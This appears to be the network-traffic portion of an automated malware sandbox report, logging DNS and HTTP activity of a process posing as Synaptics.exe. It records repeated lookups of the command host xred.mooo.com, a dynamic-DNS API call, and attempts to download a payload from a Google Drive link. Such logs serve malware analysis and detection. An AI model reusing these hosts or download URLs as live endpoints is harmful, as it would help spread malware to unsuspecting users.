                                                                                                              Dec 30, 2024 11:37:51.446288109 CET53537151.1.1.1192.168.2.4
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Dec 30, 2024 11:35:54.313699961 CET192.168.2.41.1.1.10x1b55Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:35:55.214487076 CET192.168.2.41.1.1.10xd81eStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:35:55.246777058 CET192.168.2.41.1.1.10xee20Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:35:55.345419884 CET192.168.2.41.1.1.10x2b42Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:01.527348995 CET192.168.2.41.1.1.10x7404Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:08.450062037 CET192.168.2.41.1.1.10x6c0dStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:15.582698107 CET192.168.2.41.1.1.10xd6ceStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:22.394555092 CET192.168.2.41.1.1.10x5b9aStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:29.504031897 CET192.168.2.41.1.1.10x65f1Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:36.300795078 CET192.168.2.41.1.1.10xf1b5Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:40.848048925 CET192.168.2.41.1.1.10x28b1Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:46.583889961 CET192.168.2.41.1.1.10xf1b7Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:53.417892933 CET192.168.2.41.1.1.10xccc5Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:00.224836111 CET192.168.2.41.1.1.10xef67Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:04.755146027 CET192.168.2.41.1.1.10x5a47Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:10.425905943 CET192.168.2.41.1.1.10x1737Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:17.332079887 CET192.168.2.41.1.1.10xa766Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:21.886954069 CET192.168.2.41.1.1.10x5867Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:27.598063946 CET192.168.2.41.1.1.10x836aStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:34.394710064 CET192.168.2.41.1.1.10x4badStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:41.192452908 CET192.168.2.41.1.1.10xde1bStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:45.710791111 CET192.168.2.41.1.1.10x63adStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:51.379136086 CET192.168.2.41.1.1.10xfdfdStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Dec 30, 2024 11:35:54.320921898 CET1.1.1.1192.168.2.40x1b55No error (0)docs.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:35:55.221702099 CET1.1.1.1192.168.2.40xd81eName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:35:55.253983974 CET1.1.1.1192.168.2.40xee20No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:35:55.352435112 CET1.1.1.1192.168.2.40x2b42No error (0)drive.usercontent.google.com142.250.186.97A (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:01.536122084 CET1.1.1.1192.168.2.40x7404Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:08.458672047 CET1.1.1.1192.168.2.40x6c0dName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:15.590351105 CET1.1.1.1192.168.2.40xd6ceName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:22.537523985 CET1.1.1.1192.168.2.40x5b9aName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:29.511379957 CET1.1.1.1192.168.2.40x65f1Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:36.307945013 CET1.1.1.1192.168.2.40xf1b5Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:40.769879103 CET1.1.1.1192.168.2.40xd5e6No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:40.769879103 CET1.1.1.1192.168.2.40xd5e6No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:40.855909109 CET1.1.1.1192.168.2.40x28b1Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:46.590826988 CET1.1.1.1192.168.2.40xf1b7Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:36:53.425443888 CET1.1.1.1192.168.2.40xccc5Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:00.231900930 CET1.1.1.1192.168.2.40xef67Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:04.762151003 CET1.1.1.1192.168.2.40x5a47Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:10.550421953 CET1.1.1.1192.168.2.40x1737Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:17.339066029 CET1.1.1.1192.168.2.40xa766Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:21.894351959 CET1.1.1.1192.168.2.40x5867Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:27.604885101 CET1.1.1.1192.168.2.40x836aName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:34.402811050 CET1.1.1.1192.168.2.40x4badName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:41.199850082 CET1.1.1.1192.168.2.40xde1bName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:45.718930006 CET1.1.1.1192.168.2.40x63adName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:37:51.446288109 CET1.1.1.1192.168.2.40xfdfdName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              • docs.google.com
                                                                                                              • drive.usercontent.google.com
                                                                                                              • freedns.afraid.org
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.44973969.42.215.252806908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 30, 2024 11:35:55.265538931 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                              User-Agent: MyApp
                                                                                                              Host: freedns.afraid.org
                                                                                                              Cache-Control: no-cache
                                                                                                              Dec 30, 2024 11:35:55.836880922 CET243INHTTP/1.1 200 OK
                                                                                                              Server: nginx
                                                                                                              Date: Mon, 30 Dec 2024 10:35:55 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Cache: MISS
                                                                                                              Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.449735142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:35:55 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:35:55 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:35:55 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-8YWlimg3Rk_N4qscOXL6Mw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.449736142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:35:55 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:35:55 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:35:55 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-tj06dfb76LJkCM05vx2iag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.449740142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:35:55 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:35:56 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:35:56 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-0JKfLO-aWnWOQe62j5M91A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.449741142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:35:56 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-30 10:35:56 UTC1594INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC6uJSEM2CSen1Mx2LBZYTTh5MA9ZjtLvumIy0FuHZPqh1I0yLf2MYXUck0Pb1qJa4Qn
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:35:56 GMT
                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-uEo7EtXNFFLfbgUy3hodTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Set-Cookie: NID=520=RqDXBJunwwjj2_C9QPMQBvl40xPXXJ0y_fIC7Up7BSsJU4ulAIR3W4UGJa019yDdcw-wU2ZCjiWOf6Jj4qcrHWJB3js1k8IA-AFK1jiyJsHPeBg6Vie9fWRBqVpuNHeGBLEqQFDOfY3JM5cdCJbfnFxHup-jxh0_JlhrUKdSpndAWo109eAkm-E; expires=Tue, 01-Jul-2025 10:35:56 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:35:56 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 76 33 37 4c 70 54 2d 64 36 35 45 58 52 63 6a 75 34 44 61 52 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9v37LpT-d65EXRcju4DaRg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                              2024-12-30 10:35:56 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.449743142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:35:56 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:35:56 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:35:56 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-bmdQoKjHI2BkHViSm-4Dnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.449742142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:35:56 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-30 10:35:56 UTC1601INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5Jir9ahu3x9JHDu-iNVkGTcF3O2oLQ-MSM2Z95ZgFRLJG4bt5nmMdUjkgXVnQdJCSxikhX7Zs
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:35:56 GMT
                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-h5BQBnGjmxsHdAXq3bbYgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Set-Cookie: NID=520=ANMwnx3g6cBhV0fFuX_RPPjvQ4YdkR1XvD6cxsmRyYxgLijsrrji59j-0abUEVZdnYs8a0qNq0sA_OsXLmRfKnekCyrRWoZqfgI2KO46A4ZYYOhuxohr01hnix2SH6LZz_KDx8BxOffaeHLMuzZ3yHZGijtnZrgvuwg0VPQu9C0ipgeEOJ035FM; expires=Tue, 01-Jul-2025 10:35:56 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:35:56 UTC1601INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 57 47 4f 7a 48 4a 70 45 6c 74 4c 74 4a 2d 62 52 39 78 5a 6a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PWGOzHJpEltLtJ-bR9xZjQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                              2024-12-30 10:35:56 UTC51INData Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: his server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.449746142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:35:57 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:35:57 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:35:57 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-9dd1FxEHVSU0ZlmOk3mUxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
